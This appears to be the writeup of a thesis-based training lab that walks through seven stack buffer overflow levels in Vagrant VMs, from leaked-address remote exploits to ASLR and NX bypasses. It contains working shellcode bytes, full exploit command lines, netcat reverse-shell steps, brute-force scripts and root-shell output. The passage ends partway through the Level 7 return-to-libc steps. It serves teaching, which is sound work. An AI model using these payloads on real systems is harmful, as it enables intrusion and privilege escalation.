
Several versions of **Stack Buffer Overflow vulnerabilities** and related **attacks with (reverse) shell as a payload** are implemented in this repository. The following table summarizes individual levels and the buffer overflow vulnerability with specific circumstances defined:


|        | OS |Attacker's Knowledge (Leaking Info) | Attacker Type | Attack Method | Countermeasures | CVSSv3.1 <br /> (Impact metrics) | CVSSv3.1 <br /> (Exploitability metrics) | [Overall CVSS Score](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator) <br /> |
| ------ | ------ |  ------ | ------ | ------ | ------ | ------ | ------ | ------ |
| **LVL1**  | 32bit |frame pointer (ebp) <br /> buffer address | remote | - | off | C:H/I:H/A:H | AV:N/AC:L/PR:L/UI:N/S:U | **8.8** |
| **LVL2**  | 32bit |buffer address <br /> buffer range size | remote | Spraying | off | C:H/I:H/A:H | AV:N/AC:L/PR:L/UI:N/S:U | **8.8** |
| **LVL3**  | 32bit |nothing | remote | Bruteforce (optimized)| off | C:H/I:H/A:H | AV:N/AC:H/PR:L/UI:N/S:U | **7.8** |
| **LVL4**  | 32bit |nothing | local | Debugging | off | C:H/I:H/A:H | AV:L/AC:H/PR:L/UI:N/S:U |**7.0** | 
| **LVL5**  | 64bit |buffer address|local|Debugging|*canonical addresses|  C:H/I:H/A:H | AV:L/AC:L/PR:L/UI:N/S:U | **7.8** |
| **LVL6**  | 32bit | buffer size/nothing | local | Bruteforce/Debugging (jmp *esp) | ASLR enabled |  C:H/I:H/A:H | AV:L/AC:H/PR:L/UI:N/S:U | **7.0** | 
| **LVL7**  | 32bit | nothing | local | Return-to-libc | NX bit enabled |  C:H/I:H/A:H | AV:L/AC:H/PR:L/UI:N/S:U | **7.0** |

* *Canonical addresses of 64bit OS are not countermeasure officially (see Section 5.4 od diploma thesis).

The last columns of the table provide an illustration of possible CVSSv3.1 scoring based on circumstances defined. The explanation of the values is provided in the diploma thesis, Chapter 6. 

# Introduction 

### General registers in 32bit system
 
To perform the buffer overflow attacks, the following registers play an important role: 

- **EBP** - the frame pointer or "base pointer" points to the fixed location within the stack frame from which all other addresses are calculated. On the current function's stack frame, the previous frame pointer is stored not to "lose" the previous function called the current one.
- **ESP** - register stack pointer (current location in stack)
- **EIP** - pointer to the next instruction

### Malicious payload and the attack principle 

Simplified schema of stack frame for vulnerable function _bof()_ of our provided code  (_stack.c_) looks like the following: 

```
    -> direction in which the buffer is copied 
----------------------------------------------------------------------------
| buffer of bof() | saved EBP | return address | arguments of bof() | ...........   
----------------------------------------------------------------------------
```

**The main idea of the stack buffer overflow attack** is to overwrite the return address by a new address pointing somewhere into memory where our malicious code (e.g. shellcode) is placed. How to do this will change case by case, based on the circumstance of stack buffer overflow vulnerabilities defined in the table above. 

**The malicious payload does not have a strict structure.** For Level 1 until Level 4, it looks like this:

```
----------------------------------------------------------------------------
|     NOPs instructions       | new return address overwriting the original one | NOPs | shellcode | ...........   
----------------------------------------------------------------------------
```

From Level 1 until Level 4, the methods to perform the buffer overflow attack come out of [SEEDLabs educational materials](https://www.handsonsecurity.net/files/chapters/buffer_overflow.pdf), namely spraying method and optimized brute-force algorithm. 

This means you need to find the address pointing behind the EBP and return address. The other structure, a quite popular one, put the shellcode at the beginning of the buffer as the buffer address is the only thing you need to find/guess. 

For other levels, this structure will change as countermeasures are added; see individual levels description. **More details about Buffer Overflow attack in Diploma thesis (Chapter 5).**

**Note:** You can adjust the provided files or code (and construct the payload for the attack) in any way you need. 

Characteristics of each level, also with steps to perform the attack, are described below in detail.

# Guide to used tools

Following is the list of commands useful for work with sandboxes: 


**Vagrant**

**Note:** They must be run from the directory containing the Vagrantfile.


- **vagrant up** - build virtual lab environemnt defined in Vagrant file 
- **vagrant ssh _device_machine_** - connect to VM with device_machine name using SSH
- **vagrant status** - list all virtual machines and their status
- **vagrant destroy -f** - destroy all virtual machines
- **vagrant destroy _device_name_** - destroy the virtual machine with device_name

**GDB debugger** 

- **run (r)** - run program until a breakpoint or error
- **continue (c)** - continues running the program until the next breakpoint or error
- **step (s)** - runs the next line of the program
- **break (b) _main_** - put a breakpoint at the beginning of the program (to the function **main** but others can be defined)
- **break (b) _N_** - puts a breakpoint at line N
- **delete (d) _N_** - Deletes breakpoint number N
- **disassemble (disas)** - disassembles a specified function or a function fragment.
- **info _[registers|functions|variables]_** - displays the contents of all processor registers, functions or global/static variables present in the debugged program in the debugged program
- **print _[expression]_** - prints the value of a given expression.


Other gdb commands can be found [here](https://visualgdb.com/gdbreference/commands/).


# Level 1 (32bit system)

Level 1 presents an introduction to the buffer overflow attacks. All necessary information to perform the attack is available to you as the program is leaking **frame pointer (ebp)** and the **buffer’s address** inside the vulnerable _bof()_ function (the server's response).

Your task is to understand stack memory layouts, prepare the payload, and perform the attack. 

To deal with memory possibly moving around during program execution, badfile used as a payload is filled with **NOP opcode** - the instruction does nothing; the execution continues with the following instruction until the beginning of reverse shellcode is read.

### Steps to perform the attack

All necessary files are in _~/exploits_ (`cd exploits`). 

The server is listening on port 9090 and sending responses to the client on port 9091. To communicate with the server, have opened two different shells during the whole exercise: 

1. In one terminal, run `nc -nvlp 9091` for responses from the server to the client.
2. In another terminal, run `nc -nvlp 9090` to listen on the same port as server (and for reverse shell session).

3. In the third shell, send the first hello to the server `echo hello | nc 10.10.30.5 9090` and then CTRL+C to interrupt the connection. At this moment, you should see the server’s response and leaking data. 

4. Now, adjust _exploit.py_ in _~/exploits_ with appropriate values (e.g. `sudo nano exploit.py`) - **TODO section**. Note: you can manipulate and change the payload as you want/need to. 

5. After saving the adjusted content of exploit.py, run `sudo python3 exploit.py` to generate malicious badfile. 

6. Finally, send the badfile to the server (`cat badfile | nc 10.10.30.5 9090`). Within a shell where server is listening ( (`nc -nvlp 9090`), a new shell session should be initiated.

If the attack has been performed correctly, a reverse shell session is now established on the server:

```console
listening on [any] 9090 ...
connect to [10.10.30.10] from (UNKNOWN) [10.10.30.5] 48990
bash: cannot set terminal process group (2198): Inappropriate ioctl for device
bash: no job control in this shell
root@server:/var/scripts# whoami
whoami
root
```

### Steps to perform the automated attack

1. After running `vagrant up` command (based on _Instructions_ in _README.md_), still in the same directory connect to the attacker VM (`vagrant ssh attacker`).
2. On attacker, navigate to folder with _attack.sh_ - the script that will perform the whole attack (`cd /var/scripts`). 
3. Run `./attack.sh`. 

The correct output of the script should look like the following: 

```console
vagrant@attacker:/var/scripts$ ./attack.sh 
### Initial connection to server ###
listening on [any] 9091 ...
connect to [10.10.30.10] from (UNKNOWN) [10.10.30.5] 53152
### Parameters ebp and buffer set in exploit.py ###

ebp address: 0xffffd408
buffer address 0xffffd398

### Payload 'badfile' generated ###
### ATTACK ###
listening on [any] 9090 ...
connect to [10.10.30.10] from (UNKNOWN) [10.10.30.5] 48996
bash: cannot set terminal process group (2198): Inappropriate ioctl for device
bash: no job control in this shell
root@server:/var/scripts#   
```

# Level 2 (32bit system)

In Level 2, we have removed the information of the frame pointer (ebp) address, only the **buffer's address** of vulnerable bof() function and its **size range** is provided. By default, the size is within [100,300] bytes.

The method used to cover all possible buffer sizes is so-called **spraying**, where the return address is "sprayed" over the buffer to the maximal buffer size. The principle of the return address value choice is the same as at Level 1 - the address pointing to our shellcode which is placed at the end of the payload (using NOPs in the payload to make it easier). Following is the original payload changed after applying the spraying: 

```
----------------------------------------------------------------------------
|     spraying of return address  : new return address overwriting the original one | NOPs | shellcode | ...........   
----------------------------------------------------------------------------
```

### Steps to perform the (automated) attack

Both steps to perform the (automated) attack and outputs are the same as in [_Level 1_](#steps-to-perform-attack) except that **frame pointer (ebp)** is omitted from the output.

# Level 3 (32bit system) - "Bruteforce"

In the case of no information, the attacker's only option is guessing. Therefore, there are prepared two variants of **brute-force attack**.

In **general case**, the payload is divided into spraying, NOPs, and shellcode part (described in _Level 1_ and _Level 2_) in an appropriate ratio, and all possible _Return Address (RT)_ values for spraying are tried. 

**Note:** For demonstrational purpose and feasibility of the attack, not all, just the range of the most probable RTs is used (in both brute-force versions) based on general knowledge about virtual memory space mapping and the guess. This range can be adjusted as needed—the bigger range, the more time, but also a higher probability of succeeding. 

In **optimized case**, the payload is also divided into spraying, NOPs, and shellcode part but there are specified several conditions and assumptions that allow choosing only one RT for (sub)range of a specific size. Implemented optimization is based on the theory described in _[Chapter 4.6.3](https://www.handsonsecurity.net/files/chapters/buffer_overflow.pdf), Computer & Internet Security: A Hands-on Approach, Second Edition_ or in Diploma thesis, Chapter 6.

The range of addresses through which the brute-force goes can be set in the file _exploit.py_ (`cd /var/scripts`) for both versions. By default, the range size is smaller for illustrational purposes to make the attack successful quicker.  

The difference in "speed" of versions:
- general: ± 15minutes
- optimized: ±2minutes


### Steps to perform the (automated) attack

1. After running `vagrant up` command (based on _Instructions_ in _README.md_), still in the same directory connect to the attacker VM (`vagrant ssh attacker`).
2. On the attacker, run `sudo python3 /var/scripts/bruteforce.py` or `sudo python3 /var/scripts/bruteforce-optimized.py`; scripts performing the attack. The correct output for both versions is the same: 


```console
listening on [any] 9090 ...

listening on [any] 9090 ...

listening on [any] 9090 ...

listening on [any] 9090 ...

listening on [any] 9090 ...
connect to [10.10.30.10] from (UNKNOWN) [10.10.30.5] 59660
bash: cannot set terminal process group (8213): Inappropriate ioctl for device
bash: no job control in this shell
root@server:/var/scripts# 
```
**Warning**: Due to the address mapping movements and bruteforce method, success for each run with this setting is not guaranteed.

# Level 4 (32bit system) - "Debugging"

This level is focused on the possibility of having a local attacker. In such a case, the attacker with user access rights can escalate his privileges by exploiting BO vulnerability in root **Set-UID file** as _stack.c_ is set in this level. By the direct access to the compiled program, the attacker can get all necessary information (ebp and buffer address) by its debugging  and construct a payload to exploit BO vulnerability (as in [Level 1](#level-1-32bit-system)). 

One possible flow of debugging steps is prepared resulting in BO vulnerability exploiting. 

### Steps to perform the automated attack

1. After running `vagrant up` command (based on _Instructions_ in _README.md_), still in the same directory connect to the server VM (`vagrant ssh server`) - the **attacker is local** in this case. 
2. On the server, navigate to folder with scripts for the attack performing (`cd /var/scripts/BO_debugging`). 
3. Run `./attack.sh` with pre-prepared one possible flow of debugging actions. 

The first part of the debugging output shows results of functions _**list**_ on _bof()_ and _**disas /m bof**_ to see original and disassembled code following by the try to get segmentation fault by sending too big file _getBO.txt_ filled with "A" sequence  ("A" is "41" in hexadecimal) into _stack_ program. 

```console
[*** DEBUGGING ***]
***Firstly, we try to get segmentation fault.***

... list and disas outputs omitted ...

Starting program: /var/scripts/stack < getBO.txt

Program received signal SIGSEGV, Segmentation fault.
0x080489df in dummy_function (
    str=<error reading variable: Cannot access memory at address 0xff004149>)
    at stack.c:56
56	}

(gdb) p $ebp
$1 = (void *) 0xff004141 ----> '41'/'A' is overwritting ebp address 
```

The second part is focused on getting parameters for constructing the final payload and run BO attack. 

```console
***Now, we try to get necessary parameters and constuct payload***

GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) file ../stack
Reading symbols from ../stack...done.

Breakpoint 1 at 0x8048882: file stack.c, line 22. ------> Setting breakpoint into bof()
Starting program: /var/scripts/stack < noBO.txt

Breakpoint 1, bof (
    str=0xffffd2e7 "This file is used for debugging purpose only. ")
    at stack.c:22
22	    strcpy(buffer, str);       

(gdb) p $ebp
$1 = (void *) 0xffffce78 -------> Read value of bof() epb 

(gdb) p &buffer
$2 = (char (*)[100]) 0xffffce0c -------> Read value of bof() buffer address 


[*** PARAMETERS SET IN exploit.py ***]
[*** GENERATING badfile ***]

[*** ATTACK ***]

Input size allowed: 0
File size of provided file: 517
|
```
**Warning:** In this case, the prompt is without a username/hostname or any symbol. 

### Steps to perform the attack

1. To perform the debugging part manually, run the command `gdb stack` in ~/exploits (`cd exploits`) to start file debugging. 
2. To look at the disassembled version of the code, run the command `disassemble bof`. 

3. By debugging, we want to get values of **frame pointer (ebp)** and **buffer’s address**. Therefore, set the breakpoint into the _bof_ function (`break bof`), run the program with the prepared _firsthello.txt_ file (`run < firsthello.txt`) and use the _print_ function for getting addresses:

```
(gdb) print $ebp
$1 = (void *) 0xffffceb8
(gdb) print &buffer
$2 = (char (*)[100]) 0xffffce4c
```

4. As a next step, you need to update the _exploit.py_ with received information (`sudo nano exploit.py`) and, after storing it, generate the final _badfile_ (`sudo python3 exploit.py`).

5. Finally, use payload against the stack: `./stack < badfile`. The output is the same as in the case of an automated attack.


# Level 5 (64bit system) 

This level is focused on a **64-bit OS** system where the first complications appear. By design, 64bit OS does not allow the entire virtual address space of 2^64B to be used for addressing, only 2^48B. Therefore, addresses complying with this rule are in so-called **canonical form** (from 0 to 00007FFFFFFFFFFF and from FFFF800000000000 to FFFFFFFFFFFFFFFF). 

The canonical form of addresses presents a challenge in preparing payload for buffer overflow attack as we need to overwrite only particular 48bits of the return address. **Providing non-canonical address leads to stopping reading the payload.**

Moreover, we prepare for this level two variants of stack file - _stack.c_ and _stack_randomization.c_ . 

While _stack.c_ is a bit simplified version of the original program, _stack_randomization.c_ illustrates more realistic memory movements (i.e. some random data are put on the stack to do not have individual values of addresses immediately after each other). You can use _stack_randomization.c_ mainly for a "playing" purpose as overwriting correct bits with memory movements may be tricky.

Otherwise, the principle of attack is the same as in previous levels.

### General registers in 64bit system 

This section serves as a reminder of individual general registers abbreviations in 64bit OS and their meaning. 


- **RBP** - The frame pointer or "base pointer" points to the fixed location within the stack frame from which all other addresses are calculated. On the current function's stack frame, the previous frame pointer is stored not to "lose" the previous function called the current one.
- **RSP** - register stack pointer (current location in stack) 
- **RIP** - pointer to the next instruction 

## Steps to perform the attack

**All necessary files** are on the server (`vagrant ssh server`) in folder _~/exploits_ (`cd exploits`). 

Furthermore, the attack is divided into 2 parts: **Getting offset** and **Exploitation**. 

### Getting offset

Firstly, we need to identify the required length of our payload - the buffer size, which is not known for this level. There are more ways how to get it. This time, we use [PEDA Python Extention](https://github.com/longld/peda) of GDB debugger, which provides _pattern_create_ function (similar to Metasploit one). The _pattern_create_ function creates a random string used as an input for our program, and then by _pattern_search_, peda extension finds it and calculates the required offset. In this case, the offset of the RSP register. 

The sequence of PEDA commands is automated in _get_offset.sh_ script. The **FILE_NAME** (**stack** or **stack_randomization**) need to be specified:

- Run `./get_offset.sh FILE_NAME` - the last line of the output provides required **OFFSET**. 

The following are just the same PEDA commands automated in _get_offset.sh_ script that can be used in  _gdb environment_ (run `gdb stack`):

    1. pattern_create PATTERN_SIZE FILE_TO_SAVE_PATTERN (f.e. pattern_create 200 pattern)
    2. run $(cat pattern)
    3. pattern_search

### Exploitation

1. Prepare input (**PAYLOAD**) for _stack_ file debugging in the following format (in general, this format is not strict, of course): 

`PAYLOAD: "\x90" * NOPS_NUMBER + "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05" + "\x90" * 30 + "\x42\x42\x42\x42\x42\x42"`

- `\x42\x42\x42\x42\x42\x42` represents the return address in canonical form (48bits), which we replace later by the correct value.
- `\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05` is used shellcode (48B length)
- `NOPS_NUMBER` - the length of 0x90 instructions array

**Note:** In payload, between shellcode and the return address is another area of 0x90 instructions. It is just the padding to get the required size and redistribute NOPs instruction. This payload format is not strict. It can be changed if you know how to do that and preserve the "idea" behind the stack buffer overflow attack. 

The task here is to replace **NOPS_NUMBER** with the appropriate value such that OFFSET is equal to shellcode + padding + NOPS_NUMBER. 

2. Run gdb for _stack_ file (`~/exploits$ gdb stack`). 
3. In gdb command line (`gdb-peda$`), run the following command with adjusted PAYLOAD `run $(python -c 'print PAYLOAD')` (copy and paste based on step 1). If everything is OK, you can see `SIGSEGV` and _RIP value_ is overwritten by `\x42\x42\x42\x42\x42\x42` as follows: 

```console
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()
```

4. Now, we only need to find a **new return address**. Run command `x/200xg $rsp` to read the memory block of 200 bytes in hexa format from the `$rsp`. You should see the part of the memory overwritten by our payload. That's where `\x90` starts. It can look like this: 

```console
0x7fffffffe5a0: 0x000000000000000f      0x00007fffffffe5d9
0x7fffffffe5b0: 0x0000000000000000      0x0000000000000000
0x7fffffffe5c0: 0x0000000000000000      0xe26718594d8e6900
0x7fffffffe5d0: 0x0d4fc6d397a29a2b      0x0034365f3638781b
0x7fffffffe5e0: 0x2f00000000000000      0x6761762f656d6f68
0x7fffffffe5f0: 0x7078652f746e6172      0x74732f7374696f6c
0x7fffffffe600: 0x90006762646b6361      0x9090909090909090
0x7fffffffe610: 0x9090909090909090      0x9090909090909090 <- 0x7fffffffe610 chosen address
0x7fffffffe620: 0x9090909090909090      0x9090909090909090
0x7fffffffe630: 0x9090909090909090      0x9090909090909090
0x7fffffffe640: 0x9090909090909090      0x9090909090909090
0x7fffffffe650: 0x9090909090909090      0x9090909090909090
0x7fffffffe660: 0x9090909090909090      0x9090909090909090
0x7fffffffe670: 0x9090909090909090      0x9090909090909090
0x7fffffffe680: 0x9090909090909090      0x9090909090909090
0x7fffffffe690: 0x9090909090909090      0x9090909090909090
0x7fffffffe6a0: 0x9090909090909090      0x9090909090909090
0x7fffffffe6b0: 0x9090909090909090      0x9090909090909090
0x7fffffffe6c0: 0x9090909090909090      0x9090909090909090
0x7fffffffe6d0: 0x9090909090909090      0x9090909090909090
0x7fffffffe6e0: 0x9090909090909090      0x9090909090909090
0x7fffffffe6f0: 0x9090909090909090      0x9090909090909090
0x7fffffffe700: 0x9090909090909090      0x9090909090909090
0x7fffffffe710: 0x9090909090909090      0xf631489090909090
0x7fffffffe720: 0x2f6e69622fbf4856      0x3b6a5f545768732f
0x7fffffffe730: 0x41414141050f9958      0x4141414141414141
0x7fffffffe740: 0x4141414141414141      0x4241414141414141
0x7fffffffe750: 0x4853004242424242      0x6e69622f3d4c4c45
```

In the example above, the address where `\x90` instructions start was chosen as a new return address to overwrite RIP and jump at the beginning of our payload during the program's running. 

**Note:** It is essential to choose such address where no `\x00` appear; otherwise strcpy function will stop reading the rest of the string as `\x00` is a null-terminated character. 

5. Replace `\x42\x42\x42\x42\x42\x42` by chosen address in previous step (e.g. `\x10\xe6\xff\xff\xff\x7f`). In general, be careful about the Little/Big Endian way of storing bytes. For this platform, it is Little Endian - you can check it with e.g. by the command `lscpu`.

6. In gdb command line, run the **adjusted PAYLOAD** once more as in step 3 (`run $(python -c 'print PAYLOAD')`). Successful attack should return new instance of shell. 

```console
Starting program: /home/vagrant/exploits/stack $(python -c 'print "\x90" * 250 + "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05" + "\x90" * 30 + "\x10\xe6\xff\xff\xff\x7f"')
Input size: 334
Buffer's address inside bof():     0x00007fffffffe0d0
process 3403 is executing new program: /usr/bin/dash
$ 
```

In the case of the gdb environment, the shell is not persistent this time (i.e. running any command will immediately interrupt the session). It is quite normal behaviour. We want to gain access out of the gbd environment anyway. However, the memory out of the gdb environment will be probably arranged differently. That's why the **buffer address** is leaking. Follow the next part of the guide. 

### REAL ENVIRONMENT ###

7. Run payload working in gdb environment against _stack_ file outside of the gdb (`./stack $(python -c 'print PAYLOAD')`). **Note:** without `run` this time. 

If you are lucky, the attack will be successful, but more likely not. 

8. Now, change the return address in PAYLOAD with the leaking buffer's address (output of `./stack` program in step 7). For the third time, run the command with adjusted payload against `./stack `. This time, the attack should be successful. 

```console
./stack $(python -c 'print "\x90" * 250 + "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05" + "\x90" * 30 + "\x30\xe1\xff\xff\xff\x7f"')
Input size: 334
Buffer's address inside bof():     0x00007fffffffe130
# whoami
root
# 
```

# Level 6 (32bit system) - "ASLR" 

Level 6 is focused on training of buffer overflow exploitation with **ASLR (Address space layout randomization) countermeasure** enabled. As its name says, [ASLR](https://searchsecurity.techtarget.com/definition/address-space-layout-randomization-ASLR) randomly arranges the address space positions of process data areas (stack, heap, etc. ) in order to make attacker's predictions of addresses more complicated. 

Generally, there are **more methods how to bypass ASLR**. Two of them are implemented in this repo: **Bruteforce** and **Reusing jmp instruction (debugging)**. For those two versions of attack also two versions of the stack file are prepared (_stack.c_ and _stack_bruteforce.c_). **Note:** The files have the same structure, only stack.c takes _string_ as input instead of _(bad)file_ - it is easier to debug it in this way.  

**All necessary files** are in folder _~/exploits_ (`cd exploits`). 

To check that ASLR is enabled, the command `cat /proc/sys/kernel/randomize_va_space` must return **value 2** (0 - ASLR disabled, 1 - stack, VDSO and shared memory regions are randomized, 2 - everything is randomized). More info about this option [here](https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/). 

## Bruteforcing address space

Using the brute-force method in the case of ASLR is **feasible only with 32-bit OS**, where the stack has 19bits of entropy. That presents 2^19 possibilities of stack base addresses. In 64bit OS, this method is more exhausting and needs more time - larger address space adds additional bits of entropy, multiplying the attacker's effort (see, e.g. [discussion](https://security.stackexchange.com/questions/24829/do-64-bit-applications-have-any-security-merits-over-32-bit-applications)).

For this attack, the **payload structure** should be as follow: `| SHELLCODE | PADDING | NEW RETURN ADDRESS | PADDING |`

It means you need to overwrite the original return address with the buffer address (SHELLCODE is copied at the beginning of the buffer) - similarly as in first levels. However, the buffer address is not leaked now. Therefore, you need to guess it but with ASLR enabled, this address is constantly moving. 

To perform an attack, the script provided by [SEEDLabs](https://www.handsonsecurity.net/files/chapters/buffer_overflow.pdf) was used as their experiments with brute-forcing allow to guess the address within 20minutes (12524 tries). The principle of the prepared script (`bruteforce.sh`) is to choose one address for which malicious payload (_badfile_) will be generated and try the payload so many times, as the address finally succeed - it will point to the beginning of buffer where the shellcode is placed. 

### Steps to perform the attack

1. Adjust the prepared `exploit.py` file with _new return address_ (RT) and _offset_ to overwrite the original RT (by default, the size of buffer is 100 bytes). **Note:** Possible values are already filled in, you can but do not have to change them. 
2. Run `python3 exploit.py` to generate _badfile_ which is read by the stack.   
3. Run `./bruteforce.sh` and wait ...

**Note:** Be careful; there is a possibility of running out of virtual machine resources if the attack is not successful within a reasonable time. 

## Debugging (jmp *esp)

The second variant of the attack has a higher probability of success but requires local access to the file through debugging. Note: The brute-force part can be extended to the remote version of attack, we just wanted to simplify building of sandbox with only one virtual machine. 

This time, the attack is based on `jmp *esp` instruction misusage which can be generally found in larger programs. In _stack_ file , it was hardcoded for demonstration purposes. We construct the payload to overwrite the original return address so that the program returns to our hardcoded `jmp *esp` (by **overwriting the EIP register** to prevent returning to _main_ function), and at the same time, the **ESP register pointing to our shellcode**. 

### Steps to perform the attack

For this version of the attack, the payload structure should be as follow: `| PADDING | NEW RETURN ADDRESS | SHELLCODE | `

1. Firstly, we need to obtain the `NEW RETURN ADDRESS` which is the address of `jmp *esp` instruction. Use the command `objdump` to find address of `jmp *esp` (`objdump -d ./stack | grep 'ff e4'`). Following is the example of the output, where _8049ad2_ is the wanted address. 

```console
8049ad2:	ff e4                	jmp    *%esp
```

2. As a second step, the length of `PADDING` need to be found. 

This time, we want to overwrite the return address to the _main_ function to control the execution when _main_ returns, i.e. overwrite the end of the buffer. That's why we focus on the offset of EIP register.

The offset can found by _PEDA extention_ of gdb. As it was in Level 5, `./get_offset_stack.sh` script is prepared of which output provides the value of OFFSET. 

Alternatively, the following commands in _gdb environment_ (run `gdb stack`) in specified order can be used as well: 

    1. pattern_create PATTERN_SIZE FILE_TO_SAVE_PATTERN (f.e. pattern_create 200 pattern)
    2. run $(cat pattern)
    3. pattern_search

3. To check that the offset length is correct, run testing payload with adjusted value of the offset in gdb environment:
    - Run `gdb stack` and in the gdb environment `run $(python -c 'print "A" * OFFSET + "B" * 4 + "C" * 40 ')`.
    
If the address of EIP is `0x42424242`, the offset is correct.

```console
Stopped reason: SIGSEGV
0x42424242 in ?? ()
```

To check value of individual registers, you can also run the gdb command `info registers`. 

4. Run `x/x $esp` to verify that the ESP register points to the area of `x43` where shellcode will be placed. The example of the correct output: 

```console
0xff9b2c70:	0x43
```

5. If each condition above was met (step 3 and 4), adjust the following payload with `NEW RETURN ADDRESS` of `jmp *esp` obtained in [step 1](https://gitlab.fi.muni.cz/cybersec/theses/belajova-vulnerabilities-training/-/edit/master/writeup.md#L327) and the `OFFSET`. Then, run it in gdb environment: 

`run $(python -c 'print "A" * OFFSET + NEW RETURN ADDRESS + "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x50\x68""//sh\x68""/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')`

The new instance of shell should be returned. Again, in gdb environment, the shell is not permanent. 

6. Finally, try to run the payload against the _stack_ file outside of the gdb environemnt. If the attack has been performed correctly, a shell session is established:

```console
./stack $(python -c 'print "A" * 116 + "\xd2\x9a\x04\x08" + "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x50\x68""//sh\x68""/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
Input size: 152
# whoami
root
```

# Level 7 (32bit system) - "NX bit"

This section is focused on **NX (No-eXecute) bit** countermeasure. NX bit is a technology, which allows the CPU to mark particular memory areas (pages) as non-executable or executable by setting the NX bit. Based on this label, the processor will refuse or allow executing any code residing in these areas. This type of protection prevents inserting and primarily performing malicious code, e.g. within the stack -- the basis of stack buffer overflow attack. 

One of the best-known methods to bypass the NX bit is the so-called **return-to-libc (ret2libc)** attack, implemented in this level. 

As no executable code is allowed on the stack, we will **not use shellcode** this time. However, we can use functions that are already in the system (_libc_ library). The main idea behind the attack is to overwrite the return address by the address of a function in _libc_, e.g. _system()_ and pass the correct arguments for the function execution such as _/bin/sh_.

To fully understand the idea behind the attack, you need to know how the stack frame  (the segment of the stack memory dedicated for a particular function) is structured, i.e. what is the order of individual variables on the stack and in which order they are subsequently called. An illustrative diagram with more information can be found, e.g. [here](https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/return-to-libc-ret2libc).

We simplified all necessary information to the following structure of the stack frame for the function _system()_ - the structure of our malicious payload: 

```                                                                                             
                                                                                                0xf.....f
|                                                                                           |
|                                                                                           |
|-------------------------------------------------------------------------------------------|
|           Arguments for system() ---> overwritten with the address of /bin/sh             |
|-------------------------------------------------------------------------------------------|
|     Return address for system() ----> overwritten with the address of exit() function     |
|-------------------------------------------------------------------------------------------|
|               EIP ----> overwritten with the address of system() function                 |
|-------------------------------------------------------------------------------------------|
|                                                                                           |   0x0....0       
```

**Note:** Besides addresses of the _system()_ and _/bin/sh_, we also need the address of _exit()_ function. This is a tricky part of the attack when the address of some function is required to be used for the return address value. For this purpose, exit() is usually chosen as a part of _libc_ library, validly exiting the vulnerable program.It is helpful in the case that the application logs its activity to do not produce suspicious actions. 

### Steps to perform the attack

**All necessary files** are in folder _~/exploits_ (`cd exploits`) on the server (`vagrant ssh server`).

To perform the attack, from the above said, we need to gain 4 things - **the offset of EIP register** and addresses of functions **system**, **exit** and **/bin/sh**. 

1. To get the offset of EIP, you can use the prepared automated script such as in previous levels `./get_offset_stack.sh` where the last line of the output provides **OFFSET value**. 

2. To check that value of offset is correct, you can run the testing payload adjusted by OFFSET in the gdb environment (`gdb stack`) -> `run $(python -c 'print "A"*OFFSET + "B" * 4 + "C" * 4' + "D" * 4)`. You should get the _Segmentation fault_, and the EIP should be overwritten by x42 values (”B” hexadecimal)

```console
Stopped reason: SIGSEGV
0x42424242 in ?? ()
```

To check values of general registers, run gdb command `info registers`. 

3. Before leaving the gdb session (directly after running the testing payload), run the command `print system` and `print exit` to obtain the addresses of these functions. 

```console
$1 = {<text variable, no debug info>} 0xf7e249e0 <system> ----> 0xf7e249e0 is address of system function
$2 = {<text variable, no debug info>} 0xf7e17a60 <exit>
```

4. The last thing we need to acquire is the address of _/bin/sh_, which is also in the _libc_ library, but the previous _print_ command would not work here. Therefore, we will search for this address in the memory address space range accessible in the process. For this purpose, run command `info proc mappings`. It will display the range of memory dedicated to the libc library. Following is the part of the output:

```console
process 3291
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	0x5655a000 0x5657c000    0x22000        0x0 [heap]
	0xf7de6000 0xf7dff000    0x19000        0x0 /usr/lib32/libc-2.28.so ----> This range
	0xf7dff000 0xf7f4d000   0x14e000    0x19000 /usr/lib32/libc-2.28.so
	0xf7f4d000 0xf7fbd000    0x70000   0x167000 /usr/lib32/libc-2.28.so
	0xf7fbd000 0xf7fbe000     0x1000   0x1d7000 /usr/lib32/libc-2.28.so
